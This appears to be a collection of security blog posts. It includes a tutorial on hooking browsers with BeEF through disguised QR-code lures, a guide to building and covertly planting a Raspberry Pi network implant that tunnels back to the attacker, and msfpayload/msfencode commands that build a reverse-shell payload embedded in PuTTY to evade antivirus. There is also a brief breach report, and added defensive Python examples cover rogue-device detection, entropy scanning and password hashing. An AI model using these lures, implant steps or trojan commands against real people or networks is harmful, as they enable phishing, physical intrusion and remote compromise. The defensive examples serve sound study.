Hooking Browsers With BeEF & QR Codes

For those unfamiliar with the Browser Exploitation Framework Project, or BeEF, it is a tool that can be used to launch attacks against the one door that is often left open: the web browser. Once the browser is compromised, BeEF can launch further attacks to control the system. While some of us know not to scan any QR code we find, most people assume that they are safe. You can find them posted all around. Sales circulars, marketing materials, magazines, they’re everywhere. Why not take advantage of that inherent trust?

For this tutorial, I’m going to assume that you are running Backtrack 5 R3 or Kali. If not, installation instructions can be found here.

customhook

First things first, we need to edit the customhook config. When BeEF fires up, it sets the hook location to your.i.p.address/hook/, which is pretty obvious. So by editing the config, we can set a custom name for our hook and make it a little less conspicuous. The config can be found at $BEEF_ROOT/extensions/customhook/config.yaml. Pop that open with your favorite editor and change the values to whatever you want. It's pretty self-explanatory.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        customhook:
            enable: true
            name: 'Custom Hook Point with iFrame Impersonation'
            customhook_path: "/notice"
            customhook_target: "http://heyyeyaaeyaaaeyaeyaa.com/"
            customhook_title: "Notice"

Make sure you set “enable:” to true.

qrcode

Next, we need to edit the qrcode extension’s config. All you need to do here is set “enable:” to true and set the “target:” to your customhook location (or a bit.ly link of it if you’re feeling extra sneaky ;) ). It can be found at $BEEF_ROOT/extensions/qrcode/config.yaml.

#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    extension:
        qrcode:
            name: 'QR Code Generator'
            enable: true
            authors: ["xntrik"]
            target: ["mybeefserver.com/notice"]
            qrsize: "300x300"

Now when you start BeEF, it will generate a QR code for your hook. You can also append the URL of your customhook to https://chart.googleapis.com/chart?cht=qr&chs=300x300&chl= and it’ll generate a code for you.

Attack!

Once you fire up BeEF after making the changes, it will create your custom hook in the location you set and give you a URL from which you can download your QR code. Now the only thing left to do is figure out how you want to use it. “Scan this to try our new mobile banking app for your iPhone!” The possibilities are endless.

A Beginner’s Guide to Tubular Lock Picking

http://www.youtube.com/watch?v=ulzZ9T2oGPE

Building a Network Implant With a Raspberry Pi and Kali

I recently received my Raspberry Pi Model B from Element 14 and was trying to come up with a creative way to use it. I looked around the internet and found a bunch of people doing some really cool stuff like sending their RPis into space and building automated coffee machines, but nothing really sparked my interest. Pwnplugs are expensive. The Raspberry Pwn script is cool, but doesn’t fit all of my needs. I heard that Kali Linux is supported on the Raspberry Pi and it seemed like a match made in heaven so I figured why not turn it into a drop box and have it try to connect back out to me. Although it won’t have all the cool tunneling and filter evasion stuff that a Pwnplug or Powerpwn has, it should get the job done.

Shopping list

Download and Install Kali

First, download the Kali image for Raspberry Pi from here.

Then unzip the image.

gunzip kali-linux-1.0-armel-raspberrypi.img.gz

Check the name of your SD card.

df -h

If using the SDHC card I posted above, it should be an 8.0GB filesystem at /dev/mmcblk0

Unmount the SD card so that data can be written to it

umount /dev/mmcblk0

Change /dev/mmcblk0 to reflect whatever your SD card’s name is

Then use dd to write the Kali .img to the SD card.

sudo dd bs=512k if=kali-linux-1.0-armel-raspberrypi.img of=/dev/mmcblk0

Change /dev/mmcblk0 to reflect the name of your SD card again. dd does not display its status, so if you are concerned that it has stopped working, start up top and see if it is running (or try ps xfaw | grep dd)

Once dd has completed, eject the SD card and plug it into the RPi’s SD card slot. Then attach the HDMI cable to your monitor of choice and the RPi’s port, as well as the USB keyboard and ethernet cable. Then connect the power cable and watch the device boot up. When you reach a command prompt, you’re all set and have verified the OS is working. Default creds are root / toor.

Resizing the SDHC card

It has been reported that the image may not take up the full SDHC card and you’ll be left with a bunch of useless space. I haven’t experienced the issue except with the soft-float wheezy image, but if you do, here’s how to fix that.

This will install the raspi-config script that Raspbian ships with. This includes “expand_rootfs”, which will tell the file system to use the full available space on the SD card.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20121028_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4_armel.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armel.deb
dpkg -i triggerhappy_0.3.4-2_armel.deb
dpkg -i lua5.1_5.1.5-4_armel.deb
dpkg -i raspi-config_20121028_all.deb

Finally, run the following command to get started.

raspi-config

Then just run the expand_rootfs script. This should take some time. Once it’s completed, just reboot and carry on.

Make some basic configuration changes

First, make sure you change the default root password to something difficult to guess.

passwd

Turn on SSH.

/etc/init.d/ssh start
update-rc.d ssh enable

Create yourself a non-root user.

adduser $WHATEVER
su $WHATEVER

If you want, you can have Metasploit start up on boot. (I would wait and do this manually as needed.)

service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable

Setup SSH

Install autossh

apt-get -y install autossh

Then use wget to pull down a script from Github that will setup the tunneling for us.

wget http://github.com/mikeymckay/reverse_ssh_tunnel/raw/master/setup_reverse_tunnel.sh
chmod +x ./setup_reverse_tunnel.sh
./setup_reverse_tunnel.sh

Before running the script, however, there are a few key pieces of information that you should know before the script asks for them:

Finally, run the following commands from the middleman server as well as the Pi respectively:

ssh-copy-id root@middlemanserver
ssh-copy-id root@yourpi

Operations

Upon entering a facility, find an ethernet port with access out to the internet (more common than you’d think) as well as a standard wall outlet unless you have a battery pack. Plug both cables into their respective ports and walk out.

My favorite locations are under conference room tables, copy rooms, secretary desks, and common areas such as “touchdown spaces.”

Once the device is planted and assuming it has a connection out, it should automatically connect to your listening post and you now have a presence inside the network.
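From the defender's side, the same drop box shows up first as an unexpected DHCP lease: a MAC that is not in the asset inventory, an OUI that belongs to the Raspberry Pi Foundation (B8:27:EB is the block used by the original boards such as the Model B), or a hostname left at an image default. The following is an added example, not code from this post; the DHCP log lines, the asset inventory and the hostname list are constructed for illustration. OUI and hostname checks are heuristics (a Pi behind a USB NIC or with a changed hostname will pass them); the inventory check and, ultimately, 802.1X port authentication are the controls that actually keep a planted device off the network.

```python
"""
Flag DHCP leases that look like an unexpected device (e.g. a Raspberry Pi)
appearing on the network. Added example with constructed log data.
"""
import re
from dataclasses import dataclass

# Raspberry Pi Foundation OUIs (first three octets of the MAC address).
# B8:27:EB is the block used by the original boards such as the Model B.
RASPBERRY_PI_OUIS = {"B8:27:EB", "DC:A6:32", "E4:5F:01"}

# Hostnames that match image defaults; treated as suspicious in this example.
DEFAULT_IMAGE_HOSTNAMES = {"kali", "raspberrypi"}

# Hypothetical asset inventory: MACs the network team knows about.
KNOWN_MACS = {"00:1A:2B:3C:4D:5E", "00:1A:2B:3C:4D:5F"}

# dnsmasq-style DHCPACK lines (constructed, not real traffic).
SAMPLE_DHCP_LOG = """\
Mar  3 09:12:01 gw dnsmasq-dhcp[1234]: DHCPACK(eth0) 10.0.20.15 00:1a:2b:3c:4d:5e finance-pc01
Mar  3 09:12:44 gw dnsmasq-dhcp[1234]: DHCPACK(eth0) 10.0.20.16 00:1a:2b:3c:4d:5f finance-pc02
Mar  3 13:47:09 gw dnsmasq-dhcp[1234]: DHCPACK(eth0) 10.0.20.88 b8:27:eb:12:34:56 kali
Mar  3 14:02:30 gw dnsmasq-dhcp[1234]: DHCPACK(eth0) 10.0.20.89 02:11:22:33:44:55
"""

DHCPACK_RE = re.compile(
    r"DHCPACK\(\S+\)\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
    r"(?:\s+(?P<host>\S+))?"
)


@dataclass
class Lease:
    ip: str
    mac: str
    hostname: str


@dataclass
class Finding:
    lease: Lease
    reasons: list


def parse_dhcp_log(text):
    """Extract (ip, mac, hostname) from every DHCPACK line; MACs are normalised to upper case."""
    leases = []
    for line in text.splitlines():
        m = DHCPACK_RE.search(line)
        if m:
            leases.append(Lease(m["ip"], m["mac"].upper(), m["host"] or ""))
    return leases


def oui(mac):
    """The vendor part of a MAC address, e.g. 'B8:27:EB'."""
    return mac.upper()[:8]


def assess_lease(lease, known_macs=KNOWN_MACS):
    """Return the list of reasons a lease looks suspicious (empty if it looks fine)."""
    reasons = []
    if lease.mac not in known_macs:
        reasons.append("MAC not in asset inventory")
    if oui(lease.mac) in RASPBERRY_PI_OUIS:
        reasons.append("Raspberry Pi Foundation OUI")
    if lease.hostname.lower() in DEFAULT_IMAGE_HOSTNAMES:
        reasons.append(f"suspicious hostname {lease.hostname!r}")
    return reasons


def find_rogue_devices(log_text, known_macs=KNOWN_MACS):
    """Run assess_lease over every lease in the log and collect the hits."""
    findings = []
    for lease in parse_dhcp_log(log_text):
        reasons = assess_lease(lease, known_macs)
        if reasons:
            findings.append(Finding(lease, reasons))
    return findings


if __name__ == "__main__":
    for f in find_rogue_devices(SAMPLE_DHCP_LOG):
        print(f"{f.lease.ip} {f.lease.mac} {f.lease.hostname or '-'}: {'; '.join(f.reasons)}")
```

Run against the constructed log this reports two leases: the Pi (unknown MAC, Pi OUI, default hostname) and a second unknown MAC with no other indicator. Feeding it a real DHCP server's log is a matter of adjusting the regular expression to that server's line format.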

Conclusion

And just like that, you have a network implant that will beacon out to you over an SSH tunnel as soon as it gets an internet connection. It would be great if you could combine this with an EC2 micro instance so that you don’t have to sacrifice a laptop and could have an “always on” device.

I’m sure I’ve forgotten some things and some parts may need some more detail or not work altogether. I will update this page as I work out those bugs.

Credit to T. Bradley for the idea as well as Mikey McKay for the auto-tunnel script!

Image: Raspberry Pi with the Ninja PiBow Case

Antivirus Evasion With Metasploit

I’ve been working on producing a payload that can evade a specific antivirus product and figured I would share my notes in a post. Most documentation I have found has not been updated since 2010.

So the first thing we need to do is to figure out what payload we want to use. Since Metasploit is so well-known, there isn’t a huge difference in detection rates in their raw state as seen in the image below, so pick the one that works for you.

Image: detection rates of raw Metasploit payloads. Source: fuzzexp.org

I’ll use windows/shell/reverse_tcp for this post.  Pass the needed options to msfpayload and we’re done with the first step.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R

The next thing we need to do is pipe that to msfencode to encode the payload. In its current version, Metasploit comes with 27 different encoders. Shikata Ga Nai is the only “excellent” rated x86 encoder of the bunch, so we’ll use that. We also want to run the encoder 5 times, set the template to EXE, and specify the output location, so those options are thrown in there as well.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5  -t exe -o /root/payloads/basic.exe

The problem with this is that AV will usually pick up Metasploit’s default templates, so we need to either develop our own or provide a different one. Since making a custom EXE template is a little past my current skill level, we’ll use PuTTY as our template. Download the executable from their website, put it somewhere you’ll remember, and pass it to msfencode with the -x option.

msfpayload windows/shell/reverse_tcp LHOST=62.141.42.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -x /root/putty.exe -t exe -o /root/payloads/putty.exe

Now we have a quintuple-encoded reverse_tcp payload embedded in PuTTY. Sounds great, right? Not so much. This piece of malware’s signature is picked up by 30 of 40 antivirus solutions according to VirusTotal.
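Part of why the encoded build above still gets caught is that an encoded blob does not look like the code around it: Shikata Ga Nai output is XOR-scrambled and therefore close to random, while ordinary executable code, strings and headers are far from it. Analysts and AV engines exploit exactly that with a windowed entropy scan. The script below is an added example (not from this post, and not a reimplementation of any product's engine): it slides a window over a file, computes Shannon entropy per window and merges the windows that exceed a threshold into regions. The "binary" it scans is synthetic, built from low-entropy filler text with a pseudo-random blob inserted at a known offset to stand in for a patched-in payload; the window size, step and threshold are this example's own choices. Compressed resources and cryptographic material trip the same heuristic, so treat hits as places to look, not as verdicts.

```python
"""
Windowed Shannon entropy scan: locate regions of a file whose bytes look
random, the way an encoded blob dropped into an otherwise ordinary
executable does. Added example with a synthetic sample file.
"""
import math
import random
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for a single repeated value, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data, window=256, step=64, threshold=6.0):
    """Slide a window over data and return merged (start, end) spans of
    windows whose entropy exceeds threshold. Overlapping hits are merged."""
    regions = []
    for start in range(0, max(len(data) - window, 0) + 1, step):
        chunk = data[start:start + window]
        if shannon_entropy(chunk) > threshold:
            end = start + len(chunk)
            if regions and start <= regions[-1][1]:
                regions[-1] = (regions[-1][0], max(regions[-1][1], end))
            else:
                regions.append((start, end))
    return regions


def build_sample_binary(blob_offset=2048, blob_len=512, seed=7):
    """Constructed stand-in for a host executable: repeated text (low entropy)
    with a deterministic pseudo-random blob inserted at blob_offset."""
    filler_unit = (b"This program cannot be run in DOS mode. "
                   b"Copyright notice and version strings go here. ")
    filler = (filler_unit * 200)[:4096]
    rng = random.Random(seed)
    blob = bytes(rng.getrandbits(8) for _ in range(blob_len))
    return filler[:blob_offset] + blob + filler[blob_offset:]


def scan_report(data, **kwargs):
    """(start, end, entropy) for every flagged region, entropy measured over the whole region."""
    return [(s, e, round(shannon_entropy(data[s:e]), 2))
            for s, e in high_entropy_regions(data, **kwargs)]


if __name__ == "__main__":
    clean = build_sample_binary(blob_len=0)
    print("clean filler:", scan_report(clean) or "no high-entropy regions")
    for start, end, ent in scan_report(build_sample_binary()):
        print(f"high-entropy region {start:#06x}-{end:#06x} entropy={ent}")
```

On the synthetic sample the clean filler produces no hits, while the build with the blob yields a single region that covers the inserted 512 bytes (plus a window's worth of slack on either side, since partially overlapping windows also cross the threshold). Pointing `scan_report` at a real file is just `scan_report(open(path, "rb").read())`.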

A quick note on VirusTotal: DON’T SUBMIT YOUR CUSTOM STUFF TO VIRUSTOTAL! The signature will be known and will begin to be detected. Your best bet for testing is to have a box set up with the AV you’re trying to evade, update the signature database, and then disconnect it from the network.

Obviously, there are more advanced techniques and different ways than I’ve provided here, but this should provide a foundation to build off of. I will make a new post on writing custom executable templates once I get a better understanding of that process.

Until next time.

More information and advanced tactics can be found here:

http://fuzzexp.org/anti-virus-evasion-for-metasploit.html

http://www.rapid7.com/resources/videos/evading-anti-virus-detection-with-metasploit.jsp

IEEE Breached; 100k Unencrypted Passwords

Yesterday, the Institute of Electrical and Electronics Engineers (IEEE) confirmed a breach resulting in the compromise of nearly 100,000 accounts.

The user IDs and passwords were obtained, according to the IEEE, by “inadvertent access to unencrypted log files.” Radu Dragusin, the man who discovered the breach, reports that “Among the almost 100,000 compromised users are Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford and many other places.” Ironically, the IEEE is revered for its standards and education in computer science and related fields. An organization that has released 902 publications regarding security and privacy should practice at least basic access controls and cryptographic storage.

With the lessons learned following the breaches of Yahoo, LinkedIn, Sony, and eHarmony, security incidents involving plaintext passwords should be a thing of the past. Passwords should always be stored as salted hashes rather than plaintext, so that if account information is compromised it is still difficult to recover the actual passwords and the damage from situations like this is lessened drastically.
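What "salted hash" storage looks like in practice, as an added example (not code from this post or from IEEE): each password gets its own random salt, the hash is a deliberately slow key-derivation function rather than a bare digest, the stored record is self-describing so the work factor can be raised later, and verification uses a constant-time comparison. The record format, iteration count and helper names are this example's own choices; PBKDF2-HMAC-SHA256 is used because it ships in the Python standard library. Note that hashing only protects the password store: in the IEEE case the passwords leaked from log files, so the complementary rule is never to write credentials to logs in the first place.

```python
"""
Salted, slow password hashing with the standard library (PBKDF2-HMAC-SHA256).
Added example; record format and names are this example's own.
"""
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000   # current policy; raise over time as hardware gets faster
SALT_BYTES = 16


def hash_password(password, iterations=ITERATIONS, salt=None):
    """Return a self-describing record: algorithm$iterations$salt_hex$digest_hex.
    A fresh random salt is drawn unless one is supplied (tests only)."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute the hash with the stored salt and iteration count and compare
    in constant time. Malformed or foreign records simply fail verification."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
        iterations = int(iterations)
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
    except ValueError:
        return False
    if algorithm != ALGORITHM or iterations <= 0:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


def needs_rehash(record, iterations=ITERATIONS):
    """True when a stored record is below current policy; call after a successful
    login, while the plaintext is available, and store a fresh hash_password()."""
    parts = record.split("$")
    return len(parts) != 4 or parts[0] != ALGORITHM or int(parts[1]) < iterations


if __name__ == "__main__":
    rec1 = hash_password("correct horse battery staple")
    rec2 = hash_password("correct horse battery staple")
    print("same password, two records:", rec1 != rec2)   # different salts -> different hashes
    print("verify ok:", verify_password("correct horse battery staple", rec1))
    print("verify wrong:", verify_password("Correct horse battery staple", rec1))
    old = hash_password("legacy", iterations=10_000)
    print("old record needs rehash:", needs_rehash(old))
```

The per-user salt is what makes a leaked table resistant to precomputed (rainbow-table) attacks and forces each password to be attacked separately; the iteration count is what makes each attempt expensive. Both are visible in the record, which is intentional: the secret is the password, never the parameters.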

The IEEE has notified their users and requires authentication through security questions as well as a password change the next time the user wants to access their account.

More information and a great analysis of the breach can be found at http://ieeelog.com/